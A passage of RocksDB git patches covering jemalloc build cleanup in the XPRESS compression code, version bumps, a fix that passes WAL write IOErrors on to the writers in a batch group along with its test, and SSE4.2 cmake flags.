CompressorFree(PVOID, PVOID p) { - if (p != NULL) { - je_free(p); - } -} - -#endif - } bool Compress(const char* input, size_t length, std::string* output) { @@ -73,17 +53,6 @@ bool Compress(const char* input, size_t length, std::string* output) { COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr; -#ifdef JEMALLOC - COMPRESS_ALLOCATION_ROUTINES allocationRoutines; - - // Init. allocation routines - allocationRoutines.Allocate = CompressorAlloc; - allocationRoutines.Free = CompressorFree; - allocationRoutines.UserContext = NULL; - - allocRoutinesPtr = &allocationRoutines; -#endif - COMPRESSOR_HANDLE compressor = NULL; BOOL success = CreateCompressor( @@ -94,17 +63,17 @@ bool Compress(const char* input, size_t length, std::string* output) { if (!success) { #ifdef _DEBUG std::cerr << "XPRESS: Failed to create Compressor LastError: " << - GetLastError() << std::endl; + GetLastError() << std::endl; #endif return false; } std::unique_ptr - compressorGuard(compressor, CloseCompressorFun); + compressorGuard(compressor, CloseCompressorFun); SIZE_T compressedBufferSize = 0; - // Query compressed buffer size. + // Query compressed buffer size. success = ::Compress( compressor, // Compressor Handle const_cast(input), // Input buffer @@ -123,8 +92,8 @@ bool Compress(const char* input, size_t length, std::string* output) { "XPRESS: Failed to estimate compressed buffer size LastError " << lastError << std::endl; #endif - return false; - } + return false; + } } assert(compressedBufferSize > 0); @@ -146,7 +115,7 @@ bool Compress(const char* input, size_t length, std::string* output) { if (!success) { #ifdef _DEBUG std::cerr << "XPRESS: Failed to compress LastError " << - GetLastError() << std::endl; + GetLastError() << std::endl; #endif return false; } @@ -169,16 +138,6 @@ char* Decompress(const char* input_data, size_t input_length, COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr; -#ifdef JEMALLOC - COMPRESS_ALLOCATION_ROUTINES allocationRoutines; - - // Init. allocation routines - allocationRoutines.Allocate = CompressorAlloc; - allocationRoutines.Free = CompressorFree; - allocationRoutines.UserContext = NULL; - allocRoutinesPtr = &allocationRoutines; -#endif - DECOMPRESSOR_HANDLE decompressor = NULL; BOOL success = CreateDecompressor( @@ -190,7 +149,7 @@ char* Decompress(const char* input_data, size_t input_length, if (!success) { #ifdef _DEBUG std::cerr << "XPRESS: Failed to create Decompressor LastError " - << GetLastError() << std::endl; + << GetLastError() << std::endl; #endif return nullptr; } @@ -215,8 +174,8 @@ char* Decompress(const char* input_data, size_t input_length, if (lastError != ERROR_INSUFFICIENT_BUFFER) { #ifdef _DEBUG std::cerr - << "XPRESS: Failed to estimate decompressed buffer size LastError " - << lastError << std::endl; + << "XPRESS: Failed to estimate decompressed buffer size LastError " + << lastError << std::endl; #endif return nullptr; } diff --git a/thirdparty.inc b/thirdparty.inc index 9fffd9bff07..a364d1d4480 100644 --- a/thirdparty.inc +++ b/thirdparty.inc @@ -8,8 +8,6 @@ set(USE_SNAPPY_DEFAULT 0) # SNAPPY is disabled by default, enable with -D set(USE_LZ4_DEFAULT 0) # LZ4 is disabled by default, enable with -DLZ4=1 cmake command line agrument set(USE_ZLIB_DEFAULT 0) # ZLIB is disabled by default, enable with -DZLIB=1 cmake command line agrument set(USE_XPRESS_DEFAULT 0) # XPRESS is disabled by default, enable with -DXPRESS=1 cmake command line agrument -set(USE_JEMALLOC_DEFAULT 0) # JEMALLOC is disabled by default, enable with -DJEMALLOC=1 cmake command line agrument -set(USE_JENONINIT_DEFAULT 1) # Default is enabled do not call je_init/je_uninit as the newer versions do not have it disable with -DJENONINIT=0 # # This example assumes all the libraries locate in directories under THIRDPARTY_HOME environment variable @@ -219,15 +217,15 @@ set(JEMALLOC_LIB_RELEASE ${JEMALLOC_HOME}/bin/retail/amd64/jemalloc.lib) # # Don't touch these lines # -if (DEFINED JEMALLOC) - set(USE_JEMALLOC ${JEMALLOC}) -else () - set(USE_JEMALLOC ${USE_JEMALLOC_DEFAULT}) -endif () -if (${USE_JEMALLOC} EQUAL 1) +# For compatibilty with previous +if(JEMALLOC) + set(WITH_JEMALLOC ON) +endif() + +if (WITH_JEMALLOC) message(STATUS "JEMALLOC library is enabled") - set(JEMALLOC_CXX_FLAGS "-DJEMALLOC -DJEMALLOC_EXPORT= ") + set(JEMALLOC_CXX_FLAGS "-DROCKSDB_JEMALLOC -DJEMALLOC_EXPORT= ") if(DEFINED ENV{JEMALLOC_INCLUDE}) set(JEMALLOC_INCLUDE $ENV{JEMALLOC_INCLUDE}) @@ -248,16 +246,7 @@ if (${USE_JEMALLOC} EQUAL 1) set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${JEMALLOC_LIBS}) set (ARTIFACT_SUFFIX "_je") - set(USE_JENONINIT USE_JENONINIT_DEFAULT) - - if(JENONINIT) - set(USE_JENONINIT ${JENONINIT}) - endif() - - if(${USE_JENONINIT} EQUAL 1) - add_definitions(-DJEMALLOC_NON_INIT) - message(STATUS "JEMALLOC NONINIT version") - endif() + set(WITH_JEMALLOC ON) else () set (ARTIFACT_SUFFIX "") From 9e47084ce270861e3c4598bbd15798c440527c59 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 20 Nov 2017 13:51:43 -0800 Subject: [PATCH 201/205] Bump version to 5.8.6 --- HISTORY.md | 4 ++++ include/rocksdb/version.h | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index e62622e081c..9156290e0c1 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,8 @@ # Rocksdb Change Log +## 5.8.6 (11/20/2017) +### Bug Fixes +* Fixed aligned_alloc issues with Windows. + ## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index dbc01beebed..b48732d75f2 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 5 +#define ROCKSDB_PATCH 6 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 7513f6350539d478fd5c1081a2b8dffabcbb8a08 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 28 Nov 2017 11:40:40 -0800 Subject: [PATCH 202/205] Fix IOError on WAL write doesn't propagate to write group follower Summary: This is a simpler version of #3097 by removing all unrelated changes. Fixing the bug where concurrent writes may get Status::OK while it actually gets IOError on WAL write. This happens when multiple writes form a write batch group, and the leader get an IOError while writing to WAL. The leader failed to pass the error to followers in the group, and the followers end up returning Status::OK() while actually writing nothing. The bug only affect writes in a batch group. Future writes after the batch group will correctly return immediately with the IOError. Closes https://github.com/facebook/rocksdb/pull/3201 Differential Revision: D6421644 Pulled By: yiwu-arbug fbshipit-source-id: 1c2a455c5b73f6842423785eb8a9dbfbb191dc0e --- HISTORY.md | 2 ++ db/db_impl_write.cc | 4 ++-- db/db_write_test.cc | 50 ++++++++++++++++++++++++++++++++++++++++++++- db/write_thread.cc | 5 +++++ 4 files changed, 58 insertions(+), 3 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 9156290e0c1..1d9a666be87 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,6 @@ # Rocksdb Change Log +* Fix IOError on WAL write doesn't propagate to write group follower + ## 5.8.6 (11/20/2017) ### Bug Fixes * Fixed aligned_alloc issues with Windows. diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index 8a11948f7e3..2b06c7d710c 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -319,7 +319,7 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, versions_->SetLastSequence(last_sequence); } MemTableInsertStatusCheck(w.status); - write_thread_.ExitAsBatchGroupLeader(write_group, w.status); + write_thread_.ExitAsBatchGroupLeader(write_group, status); } if (status.ok()) { @@ -543,7 +543,7 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, if (!w.CallbackFailed()) { WriteCallbackStatusCheck(status); } - nonmem_write_thread_.ExitAsBatchGroupLeader(write_group, w.status); + nonmem_write_thread_.ExitAsBatchGroupLeader(write_group, status); if (status.ok()) { status = w.FinalStatus(); } diff --git a/db/db_write_test.cc b/db/db_write_test.cc index 726f444fa16..e3e8ad829d7 100644 --- a/db/db_write_test.cc +++ b/db/db_write_test.cc @@ -3,12 +3,17 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). +#include #include #include #include #include "db/db_test_util.h" #include "db/write_batch_internal.h" +#include "db/write_thread.h" +#include "port/port.h" #include "port/stack_trace.h" +#include "util/fault_injection_test_env.h" +#include "util/string_util.h" #include "util/sync_point.h" namespace rocksdb { @@ -18,7 +23,9 @@ class DBWriteTest : public DBTestBase, public testing::WithParamInterface { public: DBWriteTest() : DBTestBase("/db_write_test") {} - void Open() { DBTestBase::Reopen(GetOptions(GetParam())); } + Options GetOptions() { return DBTestBase::GetOptions(GetParam()); } + + void Open() { DBTestBase::Reopen(GetOptions()); } }; // Sequence number should be return through input write batch. @@ -67,6 +74,47 @@ TEST_P(DBWriteTest, ReturnSeuqneceNumberMultiThreaded) { } } +TEST_P(DBWriteTest, IOErrorOnWALWritePropagateToWriteThreadFollower) { + constexpr int kNumThreads = 5; + std::unique_ptr mock_env( + new FaultInjectionTestEnv(Env::Default())); + Options options = GetOptions(); + options.env = mock_env.get(); + Reopen(options); + std::atomic ready_count{0}; + std::atomic leader_count{0}; + std::vector threads; + mock_env->SetFilesystemActive(false); + // Wait until all threads linked to write threads, to make sure + // all threads join the same batch group. + SyncPoint::GetInstance()->SetCallBack( + "WriteThread::JoinBatchGroup:Wait", [&](void* arg) { + ready_count++; + auto* w = reinterpret_cast(arg); + if (w->state == WriteThread::STATE_GROUP_LEADER) { + leader_count++; + while (ready_count < kNumThreads) { + // busy waiting + } + } + }); + SyncPoint::GetInstance()->EnableProcessing(); + for (int i = 0; i < kNumThreads; i++) { + threads.push_back(port::Thread( + [&](int index) { + // All threads should fail. + ASSERT_FALSE(Put("key" + ToString(index), "value").ok()); + }, + i)); + } + for (int i = 0; i < kNumThreads; i++) { + threads[i].join(); + } + ASSERT_EQ(1, leader_count); + // Close before mock_env destruct. + Close(); +} + INSTANTIATE_TEST_CASE_P(DBWriteTestInstance, DBWriteTest, testing::Values(DBTestBase::kDefault, DBTestBase::kConcurrentWALWrites, diff --git a/db/write_thread.cc b/db/write_thread.cc index 2d3b34602cc..afe2f27978e 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -532,6 +532,11 @@ void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, Writer* last_writer = write_group.last_writer; assert(leader->link_older == nullptr); + // Propagate memtable write error to the whole group. + if (status.ok() && !write_group.status.ok()) { + status = write_group.status; + } + if (enable_pipelined_write_) { // Notify writers don't write to memtable to exit. for (Writer* w = last_writer; w != leader;) { From a0cdc3ceccf7b1edcfbec7f9b447e58d4ea82af5 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 28 Nov 2017 12:34:06 -0800 Subject: [PATCH 203/205] Bump version to 5.8.7 --- HISTORY.md | 2 ++ include/rocksdb/version.h | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index 1d9a666be87..54fa8b87043 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,6 @@ # Rocksdb Change Log +## 5.8.6 (11/28/2017) +### Bug Fixes * Fix IOError on WAL write doesn't propagate to write group follower ## 5.8.6 (11/20/2017) diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index b48732d75f2..d592e6dae39 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 6 +#define ROCKSDB_PATCH 7 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From aead4041720f40e305e7f9d432875749d91d5a2d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 28 Nov 2017 21:28:31 -0800 Subject: [PATCH 204/205] fix HISTORY.md typo --- HISTORY.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index 54fa8b87043..e528440eeaf 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,5 +1,5 @@ # Rocksdb Change Log -## 5.8.6 (11/28/2017) +## 5.8.7 (11/28/2017) ### Bug Fixes * Fix IOError on WAL write doesn't propagate to write group follower From b8655d952df1c524e664eda39de7039a2420cd58 Mon Sep 17 00:00:00 2001 From: Kefu Chai Date: Wed, 11 Oct 2017 12:14:53 -0700 Subject: [PATCH 205/205] cmake: pass "-msse4.2" to when building crc32c.cc if HAVE_SSE42 Summary: it turns out that, with older GCC shipped from centos7, the SSE42 intrinsics are not available even with "target" specified. so we need to pass "-msse42" for checking compiler's sse4.2 support and for building crc32c.cc which uses sse4.2 intrinsics for crc32. Signed-off-by: Kefu Chai Closes https://github.com/facebook/rocksdb/pull/2950 Differential Revision: D6032298 Pulled By: siying fbshipit-source-id: 124c946321043661b3fb0a70b6cdf4c9c5126ab4 --- CMakeLists.txt | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 45bb105a2ee..404e14a87f0 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -189,8 +189,10 @@ else() endif() endif() -set(CMAKE_REQUIRED_FLAGS ${CMAKE_CXX_FLAGS}) include(CheckCXXSourceCompiles) +if(NOT MSVC) + set(CMAKE_REQUIRED_FLAGS "-msse4.2") +endif() CHECK_CXX_SOURCE_COMPILES(" #include #include @@ -198,6 +200,7 @@ int main() { volatile uint32_t x = _mm_crc32_u32(0, 0); } " HAVE_SSE42) +unset(CMAKE_REQUIRED_FLAGS) if(HAVE_SSE42) add_definitions(-DHAVE_SSE42) elseif(FORCE_SSE42) @@ -565,6 +568,12 @@ set(SOURCES utilities/write_batch_with_index/write_batch_with_index_internal.cc $) +if(HAVE_SSE42 AND NOT FORCE_SSE42) +set_source_files_properties( + util/crc32c.cc + PROPERTIES COMPILE_FLAGS "-msse4.2") +endif() + if(WIN32) list(APPEND SOURCES port/win/io_win.cc